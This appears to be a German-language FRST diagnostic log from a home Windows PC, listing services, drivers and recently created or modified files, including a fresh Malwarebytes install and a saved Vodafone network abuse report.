R2 UsbClientService; c:\Program Files (x86)\Synology\Assistant\UsbClientService.exe [248856 2017-08-08] (Synology Inc. -> ) [Datei ist nicht signiert]
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\NisSrv.exe [2467088 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MsMpEng.exe [128376 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WsAppService3; C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe [83232 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 WsDrvInst; D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe [130336 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-09-09] (ASUSTeK Computer Inc. -> )
R3 busenum; C:\WINDOWS\System32\drivers\busenum.sys [57824 2012-08-03] (Synology Inc. -> Windows (R) Win 7 DDK provider)
R3 HCW85BDA; C:\WINDOWS\system32\drivers\HCW85BDA.sys [2265832 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works)
R3 hcw85cir; C:\WINDOWS\system32\drivers\hcw85cir4.sys [79600 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-12-02] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S3 RzDev_0203; C:\WINDOWS\System32\drivers\RzDev_0203.sys [51688 2018-04-22] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0306; C:\WINDOWS\System32\drivers\RzDev_0306.sys [51776 2019-09-19] (Razer USA Ltd. -> Razer Inc)
U5 rzudd; C:\Windows\System32\Drivers\rzudd.sys [204824 2016-10-30] (Razer USA Ltd. -> Razer Inc)
R3 SteamStreamingMicrophone; C:\WINDOWS\system32\drivers\SteamStreamingMicrophone.sys [40736 2017-07-28] (Valve Corp. -> )
R3 SteamStreamingSpeakers; C:\WINDOWS\system32\drivers\SteamStreamingSpeakers.sys [40736 2017-07-21] (Valve Corp. -> )
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [48536 2020-11-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [429288 2020-11-06] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [71912 2020-11-06] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-12-02 22:55 - 2020-12-02 22:55 - 000024568 _____ C:\Users\Tom\Desktop\FRST.txt
2020-12-02 22:49 - 2020-12-02 22:53 - 000000326 _____ C:\Users\Tom\Desktop\Search.txt
2020-12-02 22:43 - 2020-12-02 22:44 - 000005841 _____ C:\Users\Tom\Desktop\Fixlog.txt
2020-12-02 22:43 - 2020-12-02 22:43 - 000000000 ____D C:\Users\Tom\AppData\Local\PeerDistRepub
2020-12-02 22:37 - 2020-12-02 22:37 - 000132833 _____ C:\Users\Tom\Desktop\Updater.pdf
2020-12-02 22:25 - 2020-12-02 22:26 - 000081337 _____ C:\Users\Tom\Desktop\Additiona.txt
2020-12-02 21:38 - 2020-12-02 22:26 - 000068680 _____ C:\Users\Tom\Desktop\FRSTa.txt
2020-12-02 21:38 - 2020-12-02 21:38 - 000000000 ____D C:\Users\Tom\Desktop\FRST-OlderVersion
2020-12-02 21:37 - 2020-12-02 22:55 - 000000000 ____D C:\FRST
2020-12-02 21:37 - 2020-12-02 21:38 - 002288640 _____ (Farbar) C:\Users\Tom\Desktop\FRST64.exe
2020-12-02 21:35 - 2020-12-02 21:35 - 000010256 _____ C:\Users\Tom\Desktop\2020_12_02 Malwarebyte.txt
2020-12-02 21:31 - 2020-12-02 21:31 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000000000 ____D C:\Users\Tom\AppData\Local\mbam
2020-12-02 21:30 - 2020-12-02 21:30 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\Program Files\Malwarebytes
2020-12-02 21:06 - 2020-12-02 21:06 - 000030894 _____ C:\Users\Tom\Desktop\Vodafone - Network Abuse Report.html
2020-12-02 21:06 - 2020-12-02 21:06 - 000000000 ____D C:\Users\Tom\Desktop\Vodafone - Network Abuse Report-Dateien
2020-11-28 20:30 - 2020-11-28 20:30 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-28 20:27 - 2020-11-28 20:27 - 000000020 ___SH C:\Users\Vincent\ntuser.ini
2020-11-28 19:48 - 2020-12-02 22:38 - 000061440 _____ C:\Users\Tom\AppData\Roaming\cookies.sqlite
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\Users\Public\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\ProgramData\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer Generals and Zero Hour
2020-11-24 10:54 - 2020-11-24 10:54 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-11-16 10:30 - 2020-11-16 10:30 - 000000020 ___SH C:\Users\Tom_Admin\ntuser.ini
2020-11-16 10:30 - 2020-11-16 10:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2020-11-11 07:09 - 2020-11-11 07:09 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:09 - 2020-11-11 07:09 - 000009265 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-11-11 07:08 - 2020-11-11 07:08 - 000363520 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000197632 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000152576 _____ C:\WINDOWS\system32\EoAExperiences.exe
2020-11-10 11:03 - 2020-12-02 22:51 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-10 11:01 - 2020-11-28 10:15 - 000003606 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6b7481de5e69e
2020-11-10 11:01 - 2020-11-10 11:01 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2020-11-10 11:00 - 2020-11-10 11:00 - 000000020 ___SH C:\Users\Tom\ntuser.ini
2020-11-10 10:59 - 2020-12-02 22:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-10 10:59 - 2020-11-28 20:29 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1003
2020-11-10 10:59 - 2020-11-28 20:28 - 000004256 _____ C:\WINDOWS\system32\Tasks\Opera GX scheduled Autoupdate 1581624516
2020-11-10 10:59 - 2020-11-28 10:15 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-25 08:33 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-10 10:59 - 2020-11-16 10:30 - 000003650 _____ C:\WINDOWS\system32\Tasks\GarminUpdaterTask
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagwrn.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagerr.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000003558 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-10 10:59 - 000003404 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003334 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003220 _____ C:\WINDOWS\system32\Tasks\Intel PTT EK Recertification
2020-11-10 10:59 - 2020-11-10 10:59 - 000003180 _____ C:\WINDOWS\system32\Tasks\klcp_update
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002956 _____ C:\WINDOWS\system32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1002
2020-11-10 10:59 - 2020-11-10 10:59 - 000002838 _____ C:\WINDOWS\system32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 _SHDL C:\Documents and Settings
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\NCH Software
2020-11-10 10:57 - 2020-11-10 10:57 - 000000368 ____H C:\WINDOWS\Tasks\Intel PTT EK Recertification.job
2020-11-10 10:53 - 2020-12-02 22:45 - 000008192 ___SH C:\DumpStack.log.tmp
2020-11-10 10:53 - 2020-12-02 20:53 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-10 10:53 - 2020-11-11 17:52 - 000444272 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-10 10:53 - 2020-11-10 11:00 - 000000000 ____D C:\Windows.old
2020-11-10 09:46 - 2020-11-10 10:53 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2020-11-10 09:44 - 2020-11-28 20:29 - 000002385 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2020-11-28 20:27 - 000000000 ____D C:\Users\Vincent
2020-11-10 09:44 - 2020-11-16 10:30 - 000000000 ____D C:\Users\Tom_Admin
2020-11-10 09:44 - 2020-11-10 11:00 - 000000000 ____D C:\Users\Tom
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Anwendungsdaten
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:43 - 2020-11-10 09:46 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2020-11-10 09:42 - 2020-11-10 09:42 - 006012185 _____ C:\Users\Tom\Desktop\2020-11-10_Schwaebische_Zeitung_Laupheim_-_10-11-2020.pdf
2020-11-10 09:42 - 2020-11-10 09:42 - 000000000 ____D C:\ProgramData\ssh
2020-11-10 09:40 - 2020-11-10 09:40 - 004898144 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 003860832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 001822256 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001393472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001354080 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001309504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2020-11-10 09:40 - 2020-11-10 09:40 - 001091936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001032544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000980320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000915296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000732000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000611952 _____ C:\WINDOWS\SysWOW64\TextShaping.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2020-11-10 09:40 - 2020-11-10 09:40 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000455168 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2020-11-10 09:40 - 2020-11-10 09:40 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bthprops.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpg2splt.ax
2020-11-10 09:40 - 2020-11-10 09:40 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000137016 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\activeds.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 000111616 _____ C:\WINDOWS\system32\RDVGHelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000101688 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000100864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncpa.cpl
2020-11-10 09:40 - 2020-11-10 09:40 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2020-11-10 09:40 - 2020-11-10 09:40 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2020-11-10 09:40 - 2020-11-10 09:40 - 000056672 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmmvrortc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000048640 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000047472 _____ C:\WINDOWS\SysWOW64\umpdc.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000045880 _____ C:\WINDOWS\system32\HvSocket.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000039936 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 002260480 _____ (The ICU Project) C:\WINDOWS\system32\icu.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000707544 _____ C:\WINDOWS\system32\TextShaping.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000645120 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000306176 _____ C:\WINDOWS\system32\HeatCore.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000287232 _____ C:\WINDOWS\system32\CoreMas.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000165376 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-10 09:39 - 2020-11-10 09:39 - 000089088 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000073216 _____ C:\WINDOWS\system32\windows.applicationmodel.conversationalagent.internal.proxystub.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000064552 _____ C:\WINDOWS\system32\umpdc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2020-11-10 09:39 - 2020-11-10 09:39 - 000029696 _____ (The ICU Project) C:\WINDOWS\system32\icuuc.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000025088 _____ (The ICU Project) C:\WINDOWS\system32\icuin.dll
2020-11-10 09:39 - 2020-11-10 09:39 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\SysWOW64\xpsrchvw.xml
2020-11-10 09:35 - 2020-11-10 09:35 - 000076060 _____ C:\WINDOWS\system32\xpsrchvw.xml
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files\MSBuild
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2020-11-10 09:33 - 2020-11-10 09:33 - 000000000 ____D C:\Program Files (x86)\MSBuild
2020-11-10 09:28 - 2020-11-10 09:28 - 000008192 _____ C:\WINDOWS\system32\config\userdiff
2020-11-10 09:10 - 2020-11-28 19:58 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-11-10 09:08 - 2020-11-10 11:00 - 000000000 ___DC C:\WINDOWS\Panther
2020-11-10 09:05 - 2020-11-10 09:05 - 000000000 ___HD C:\$WinREAgent
2020-11-09 10:15 - 2020-11-09 10:15 - 000000685 _____ C:\Users\Tom\Desktop\opensearch.xml

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-12-02 22:51 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2020-12-02 22:51 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2020-12-02 22:51 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2020-12-02 22:46 - 2017-12-04 20:37 - 000000000 ____D C:\Users\Tom\AppData\Local\Origin
2020-12-02 22:46 - 2017-12-04 20:37 - 000000000 ____D C:\ProgramData\Origin
2020-12-02 22:46 - 2017-12-02 16:35 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\Mozilla
2020-12-02 22:45 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-12-02 22:45 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-12-02 22:45 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Hauppauge
2020-12-02 22:45 - 2017-12-02 07:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-12-02 22:44 - 2020-05-13 14:25 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\Temp
2020-12-02 22:08 - 2020-10-22 18:33 - 000002361 _____ C:\Users\Tom_Admin\Desktop\Microsoft Edge.lnk
2020-12-02 22:08 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-12-02 22:08 - 2017-12-01 17:06 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Packages
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-12-02 22:07 - 2017-12-01 17:06 - 000000000 ___RD C:\Users\Tom_Admin\3D Objects
2020-12-02 21:30 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-12-02 20:53 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2020-12-02 20:07 - 2017-12-04 20:38 - 000000000 ____D C:\Program Files (x86)\Origin
2020-12-01 14:51 - 2020-07-02 17:43 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
